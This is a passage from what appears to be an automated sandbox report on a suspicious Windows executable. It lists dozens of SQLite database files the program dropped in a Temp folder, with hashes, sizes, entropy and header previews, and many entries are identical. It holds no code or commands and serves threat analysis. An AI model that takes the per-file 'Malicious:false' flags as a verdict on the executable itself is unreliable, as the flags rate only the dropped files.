                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\TqPKtXFl8p

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\U9E9NrZEsb

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\UTPypqFlfo

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\UX0fGhptip

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\UZBDFUtttw

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\UrxRiHr1XE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\UxCGjIscaZ

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\VJWvYsDyz5

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\VXqWsEBRgR

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\VYhDsvFywS

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\VeJHUKFPUy

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\VqAlNrE0HE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\WColy7qJtq

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\WDEQsCFrsi

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\WFyrNNYTfG

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\WGQcNUm87S

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\WYTMJaujdh

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\WbRBcXfFQR

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\XRJDwYpyXE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Xymen1sgcp

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\YF9UUCyy4O

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\YNq1iIJ0b6

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\YPrMpbHMQZ

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
